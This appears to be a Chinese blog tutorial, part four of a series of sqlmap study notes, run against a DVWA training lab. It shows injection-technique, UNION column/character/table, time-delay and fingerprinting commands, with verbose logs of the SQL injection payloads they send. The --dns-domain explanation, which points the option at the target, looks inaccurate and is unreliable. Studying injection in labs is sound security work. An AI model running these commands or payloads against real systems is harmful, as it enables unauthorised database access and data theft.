UNION

UNION

关注
发信
关注(28)粉丝(399)

Sqlmap学习笔记(四)

指定注入技术

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique="BEUSTQ"

B:基于Boolean类型盲注

E:基于报错的注入

U:联合查询注入

S:堆叠注入

T:基于时间的盲注

Q:内联查询注入

默认使用所有注入技术,--technique="BEUSTQ"

设置时间盲注的参数

--time-sec:设置基于时间盲注的延时,单位是秒,默认5秒

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique=T --time-sec=1

联合注入的参数

--union-cols:设置联合注入的列数,默认1-10列。虽然通过提高--level可以增加列数,但是可以通过--union-cols可以设置固定的列数。例如:设置union测试的列为12-18

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-cols="12-18"

--union-char:设置union注入的字符,默认是NULL。设置更高级别的level时,会使用随机数进行测试,因为某些情况下,union查询测试NULL会失效,而随机数会成功。例如:设置union字符为"123"

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-char="123" -v 3

使用123作为union字符,默认查询1-10列

[22:19:32] [PAYLOAD] -9103) ORDER BY 1-- JliU
[22:19:32] [PAYLOAD] -6117) ORDER BY 4864-- XFDV
[22:19:32] [PAYLOAD] -5546) UNION ALL SELECT 123-- ueOQ
[22:19:32] [PAYLOAD] -8136) UNION ALL SELECT 123,123-- ksax
[22:19:33] [PAYLOAD] -6350) UNION ALL SELECT 123,123,123-- UHzH
[22:19:33] [PAYLOAD] -4218) UNION ALL SELECT 123,123,123,123-- rbVp
[22:19:33] [PAYLOAD] -1370) UNION ALL SELECT 123,123,123,123,123-- iprn
[22:19:33] [PAYLOAD] -5507) UNION ALL SELECT 123,123,123,123,123,123-- Inhq
[22:19:33] [PAYLOAD] -9862) UNION ALL SELECT 123,123,123,123,123,123,123-- IwGO
[22:19:33] [PAYLOAD] -5351) UNION ALL SELECT 123,123,123,123,123,123,123,123-- EdWF
[22:19:33] [PAYLOAD] -3384) UNION ALL SELECT 123,123,123,123,123,123,123,123,123-- ThkG
[22:19:33] [PAYLOAD] -6285) UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123-- vyBV

--union-from:设置union注入要查询的表,如设置users表作为union注入要查询的表

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-from="users" -v 3

默认查询字符使用NULL,查询范围1-10,指定的表为users

[22:27:16] [PAYLOAD] 1) ORDER BY 1-- Vrdu
[22:27:16] [WARNING] reflective value(s) found and filtering out
[22:27:16] [PAYLOAD] 1) ORDER BY 6196-- MvfX
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL FROM users-- cmox
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL FROM users-- FwKo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL FROM users-- fmaB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL FROM users-- MuVY
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL FROM users-- Wijp
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL FROM users-- wYUU
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- rWYB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LvGo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LnTt
[22:27:17] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- YGVF

针对DNS攻击

--dns-domain:通过指定目标DNS服务器攻击,需要目标开放了53端口的dns服务。

sqlmap -u "目标URL" --dns-domain="目标URL"

获取数据库指纹信息

-f或者--fingerprint

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=8jh3juigrkaqipeu1oiinhcpbi; security=low" -f

由此可见,数据库是Mysql,版本号是5.7

[20:15:10] [INFO] testing MySQL
[20:15:10] [INFO] confirming MySQL
[20:15:11] [INFO] the back-end DBMS is MySQL
[20:15:11] [INFO] actively fingerprinting MySQL
[20:15:11] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.7.26
               html error message fingerprint: MySQL
12-20 20:32
Powered by LMLPHP ©2024 UNION 0.064050